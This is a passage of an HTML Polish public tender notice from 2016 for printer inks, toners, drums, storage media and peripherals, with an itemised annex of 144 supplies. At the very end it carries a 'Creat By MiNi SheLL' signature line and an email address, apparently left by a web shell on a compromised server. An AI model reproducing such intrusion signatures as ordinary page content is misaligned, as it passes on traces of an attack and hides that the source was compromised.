                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1) Katalog lub broszury informacyjnej w języku polskim z zaznaczeniem oferowanego produktu, którego autentyczność musi zostać poświadczona przez Wykonawcę na żądanie Zamawiającego.
2) próbka  egzemplarz pokazowy dla pozycji  72 i 80.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/09/2016, godzina: 08:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>artykuły komputerowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>L.P.	NAZWA ASORTYMENTU	PARAMETRY	ILOŚĆ	J.M.
1	Tusz do drukarki	HP nr 15 czarny	17	szt.
2	Tusz do drukarki	HP nr 17 kolor	3	szt.
3	Tusz do drukarki	HP nr 45 czarny	6	szt.
4	Tusz do drukarki	HP nr 78 kolor	7	szt.
5	Tusz do drukarki	HP nr 56 czarny	39	szt.
6	Tusz do drukarki	HP nr 23D kolor	2	szt.
7	Tusz do drukarki	HP nr 344	8	szt.
8	Tusz do drukarki	HP nr 350XL czarny	2	szt.
9	Tusz do drukarki	HP nr 27 czarny	2	szt.
10	Tusz do drukarki	HP nr 28 kolor	2	szt.
11	Tusz do drukarki	HP nr 338	4	szt.
12	Tusz do drukarki	HP nr 21 czarny	3	szt.
13	Tusz do drukarki	HP nr 339	25	szt.
14	Tusz do drukarki	HP nr 343	2	szt.
15	Tusz do drukarki	HP nr 57 kolor	12	szt.
16	Tusz do drukarki	Canon BX-3CZ	12	szt.
17	Tusz do drukarki	Epson C-86czarny	2	szt.
18	Tusz do drukarki	EpsonDX4000 czarny	2	szt.
19	Tusz do drukarki	Epson DX4000kpi kolor	2	szt.
20	Tusz do drukarki	Lexmark 2300/2400	2	szt.
21	Tusz do nagrywarki Primera	disk Publisher I/II/xR,czarny	10	szt.
22	Tusz do nagrywarki Primera	disk Publisher I/II/xR,kolor	5	szt.
23	Tusz do drukarki	Canon PGI-525 BK	2	szt.
24	Tusz do drukarki	Canon BJC 1000 czarny	2	szt.
25	Tusz do nagrywarki RIMAGE 2000i seriesII	RC1  C8857a	12	szt.
26	Tusz do nagrywarki RIMAGE 2000i seriesII	RB1 C8856a	14	szt.
27	Toner do drukarki	HP 1100	64	szt.
28	Toner do drukarki	HP1320/1160	89	szt.
29	Toner do drukarki	HP 4l	2	szt.
30	Toner do drukarki	HP 1010	167	szt.
31	Toner do drukarki	HP 2550czarny	2	szt.
32	Toner do drukarki	HP 2550 kolor	4	szt.
33	Toner do drukarki	HP 2300	4	szt.
34	Toner do drukarki	HP 1150	51	szt.
35	Toner do drukarki	HP 2100	3	szt.
36	Toner do drukarki	HP 1200	74	szt.
37	Toner do drukarki	HP 2015 czarny	42	szt.
38	Toner do drukarki	HP 2035/2055	74	szt.
39	Toner do drukarki	HP 1600/2600 kolor	29	szt.
40	Toner do drukarki	HP 1600/2600 czarny	17	szt.
41	Toner do drukarki	HP 5L	5	szt.
42	Toner do drukarki	HP 1505	33	szt.
43	Toner do drukarki	HP 1300	23	szt.
44	Toner do drukarki	HP 4650 czarny	5	szt.
45	Toner do drukarki	HP 4650 kolor	7	szt.
46	Toner do drukarki	HP 1215/1518 kolor	2	szt.
47	Toner do drukarki	HP 1215/1518 czarny	2	szt.
48	Toner do drukarki	Toshiba 1350E	3	szt.
49	Toner do drukarki	Toshiba 1550E	3	szt.
50	Toner do drukarki	Toshiba Studio 160   1600	2	szt.
51	Toner do drukarki	fax Philips Magic 3	2	szt.
52	Toner do drukarki	Panasonic KX-FA52	87	szt.
53	Toner do drukarki	Panasonic KX-FA 57A	9	szt.
54	Toner do drukarki	Panasonic KX-FL511FA-83	14	szt.
55	Toner do drukarki	Panasonic KX-FAT 92E	2	szt.
56	Toner do drukarki	Samsung ML2010	64	szt.
57	Toner do drukarki	Samsung SCX4216F	7	szt.
58	Toner do drukarki	Samsung 1610/2510	24	szt.
59	Toner do drukarki	Samsung 2850	10	szt.
60	Toner do drukarki	Xerox 3117	2	szt.
61	Toner do drukarki	Canon IR-1018/1022	17	szt.
62	Toner do drukarki	Canon 1215	2	szt.
63	Toner do drukarki	Canon E30 FC 200/300	3	szt.
64	Toner do drukarki	Canon PC1210D/1270 	2	szt.
65	Toner do drukarki	Canon 6012	2	szt.
66	Toner do drukarki	Canon IR-2016	2	szt.
67	Toner do drukarki	Olivetti D-Copia 164MF	2	szt.
68	Toner do drukarki	Ricoh 1230D/Gestetner MP2000	4	szt.
69	Toner do drukarki	Sharp UX-9CR	5	szt.
70	Toner do drukarki	Koycera TK-18 	4	szt.
71	Toner do drukarki	Lexmark Optra E250/350/352	12	szt.
72	Toner do drukarki	Konika Minolta 1300/1350	8	szt.
73	Toner do drukarki	Nashuatec MP-C2500	2	szt.
74	Toner do drukarki	Ricoh MPC 2500/3000	5	szt.
75	Toner do drukarki	Sharp A-R 5012/122/153	2	szt.
76	Toner do drukarki	HP 2025 czarny	5	szt.
77	Toner do drukarki	HP 2025kolor	14	szt.
78	Toner do drukarki	HP 1005	18	szt.
79	Toner do drukarki	Brother TN 2120	2	szt.
80	Toner do drukarki	Panasonic KX-FL513	2	szt.
81	Toner do drukarki	Brother LC-980 BK black	5	szt.
82	Toner do drukarki	Xerox  Phaser 7400DN kolor	7	szt.
83	Toner do drukarki	Xerox  Phaser 7400DN czarny	4	szt.
84	Toner do drukarki	OKI 3300/3400	2	szt.
85	Toner do drukarki	Ricoh SP 3400	2	szt.
86	Toner do drukarki	Samsung ML 1640	5	szt.
87	Toner do drukarki	Toshiba E-studio 163/165	2	szt.
88	Toner do drukarki	Toshiba E-120	2	szt.
89	Toner do drukarki	Canon FX-10      L-140	4	szt.
90	Toner do drukarki	Canon fax L-380	3	szt.
91	Toner do drukarki	Fax Panasonic KX-FA 136A	4	szt.
92	Toner do drukarki	HP 3015	14	szt.
93	Toner do drukarki	Samsung ML 1600/1665	8	szt.
94	Toner do drukarki	Samsung CLP 315	2	szt.
95	Toner do drukarki	HP 4M/5M	2	szt.
96	Toner do drukarki	HP LJ  P1566	48	szt.
97	Toner do drukarki	Canon 6650	18	szt.
98	Toner do drukarki	Nashuatec D418(Afico)	2	szt.
99	Tusz do drukarki	Canon IP4700 czarny	2	szt.
100	Tusz  do drukarki	Canon IP4700 kolor	4	szt.
101	Toner do drukarki	Brother TN-2110	6	szt.
102	Toner do drukarki	Canon LBP7750 czarny	6	szt.
103	Toner do drukarki	Canon LBP7750 kolor	7	szt.
104	Tusz do drukarki	Canon PGI 520 black	3	szt.
105	Toner do drukarki	Minolta 1600/1690	2	szt.
106	Toner do drukarki	Panasonic KX-FA55A	2	szt.
107	Toner do drukarki	Canon BCI 21 czarny	2	szt.
108	Tusz do drukarki	Canon IP4200 BK czarny	2	szt.
109	Tusz do drukarki	Canon IP4200 BK kolor	2	szt.
110	Toner do drukarki	HP Lj M 1212/P1102(85A)	12	szt.
111	Toner do drukarki	400M PRO  80A black	18	szt.
112	Toner do drukarki	HP LJ M3035xsMFP	4	szt.
113	Toner do drukarki	HP LJ 4050	3	szt.
114	Toner do drukarki	fax Szarp UX-C70B	3	szt.
115	Toner do drukarki	Brother HL-3040CN czarny	7	szt.
116	Toner do drukarki	Brother HL-3040CN kolor	12	szt.
117	Toner do drukarki	HP  P1102w	10	szt.
118	Toner do drukarki	Lexmark X363dn 	26	szt.
119	Toner do drukarki	Lexmark E260dn  	113	szt.
120	Bęben do drukarki	Lexmark X363dn 	2	szt.
121	Bęben do drukarki	Lexmark E260 	23	szt.
122	Bęben do drukarki	CJL 2550/2800	2	szt.
123	Bęben do drukarki	Panasonic KX-FA 84 KX-FL513/613	5	szt.
124	Bęben do drukarki	Imaging Unit PH7400 kolor	4	szt.
125	Bęben do drukarki	Imaging Unit PH7400czarny	3	szt.
126	Bęben do drukarki	Konica Minolta 1350  	8	szt.
127	Taśma do drukarki	SEIKO TP 10/20	2	szt.
128	Taśma do drukarki	OKI 320	3	szt.
129	Taśma do drukarki	Epson FX-2190	5	szt.
130	Taśma do drukarki	Panasonic KXP-1124	2	szt.
131	Taśma LTO ULTRIUM 5	LTO Ultrium 5 1,5TB/3,0TB	12	szt.
132	Taśma do drukarki	Brother DK-22210	2	szt.
133	Płyta CD-R	pakow.pojedyńczo	5000	szt.
134	Płyta DVD+R	4,7GB, Verbatim, pak. pojedyńczo	750	szt.
135	Papier  komputerowy	375x12x2	2	szt.
136	Papier  komputerowy	240mmx12, pojedyńczy	3	szt.
137	Rolka termiczna	57x100	40	szt.
138	Rolka termiczna	57x20	5	szt.
139	Rolka termiczna	110x20	24	szt.
140	Klawiatura komputerowa	uniwersalna	140	szt.
141	Mysz do komputera	uniwersalna	220	szt.
142	Kabel do druk.USB 2.0	USB 2.0    1,8m  A-B	10	szt.
143	Wtyki RJ45	opak.100 szt.	6	op.
144	Karton skrętki UTP kat. 5e	305m, drut	3	szt.
				
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33125110-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>toner<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Toner do drukarki HP Laser Jet CP1025 COLOR<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33125110-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com